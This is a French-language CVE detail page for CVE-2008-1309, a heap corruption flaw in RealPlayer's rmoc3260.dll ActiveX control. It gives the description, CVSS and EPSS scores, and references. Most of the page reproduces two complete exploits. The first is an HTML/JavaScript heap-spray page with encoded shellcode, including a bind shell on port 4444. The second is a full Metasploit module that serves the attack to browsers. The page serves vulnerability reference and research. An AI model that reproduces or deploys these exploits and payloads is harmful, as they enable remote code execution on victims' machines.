CVE-2008-1309 : Détail

CVE-2008-1309

96.86%V3
Network
2008-03-12
16h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5332

Date de publication : 2008-03-31 22h00 +00:00
Auteur : Elazar
EDB Vérifié : Yes

<!-- Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption) written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45 Thanks to h.d.m. and the Metasploit crew --> <html> <head> <title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title> <script language="JavaScript" defer> function Check() { // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" + "%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" + "%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" + "%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" + "%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" + "%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" + "%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" + "%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" + "%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" + "%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" + "%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" + "%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" + "%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" + "%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" + "%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" + "%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" + "%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" + "%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" + "%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" + "%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" + "%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" + "%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" + "%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" + "%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" + "%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" + "%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" + "%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" + "%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" + "%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" + "%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" + "%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" + "%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" + "%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" + "%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" + "%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" + "%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" + "%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" + "%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" + "%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" + "%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" + "%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" + "%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" + "%u684f%u3956%u386f%u4350"); var bigblock = unescape("%u0C0C%u0C0C"); var headersize = 20; var slackspace = headersize + shellcode1.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 } var buf = ''; while (buf.length < 32) buf = buf + unescape("%0C"); var m = ''; m = obj.Console; obj.Console = buf; obj.Console = m; m = obj.Console; obj.Console = buf; obj.Console = m; } </script> </head> <body onload="JavaScript: return Check();"> <object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj"> Unable to create object </object> </body> </html> # milw0rm.com [2008-04-01]
Exploit Database EDB-ID : 16584

Date de publication : 2010-06-14 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: realplayer_console.rb 9525 2010-06-15 07:18:08Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption', 'Description' => %q{ This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad <elazarb[at]earthlink.net>' ], 'Version' => '$Revision: 9525 $', 'References' => [ [ 'CVE', '2008-1309' ], [ 'OSVDB', '42946' ], [ 'BID', '28157' ], [ 'URL', 'http://secunia.com/advisories/29315/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 32, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Mar 8 2008', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = Rex::Text.uri_encode([target.ret].pack('L')) blocksize = 0x40000 fillto = 400 offset = target['Offset'] # Randomize the javascript variable names racontrol = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) j_ret = rand_text_alpha(rand(100) + 1) # Build out the message content = %Q|<html> <object classid='clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93' id='#{racontrol}'></object> <script language='javascript'> #{j_shellcode} = unescape('#{shellcode}'); #{j_nops} = unescape('#{nops}'); #{j_headersize} = 20; #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops}; #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); while(#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; #{j_memory} = new Array(); for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; #{j_ret} = unescape('#{ret}'); while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; #{racontrol}.Console = #{j_ret}; #{racontrol}.Console = ''; #{racontrol}.Console = #{j_ret}; </script> </html> | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

Products Mentioned

Configuraton 0

Realnetworks>>Realplayer >> Version *

Realnetworks>>Realplayer >> Version 10.0

Realnetworks>>Realplayer >> Version 10.5

Realnetworks>>Realplayer >> Version 11

    Références

    http://secunia.com/advisories/29315
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securitytracker.com/id?1019576
    Tags : vdb-entry, x_refsource_SECTRACK
    https://www.exploit-db.com/exploits/5332
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2008/0842
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.kb.cert.org/vuls/id/831457
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.securitytracker.com/id?1020563
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.securityfocus.com/bid/28157
    Tags : vdb-entry, x_refsource_BID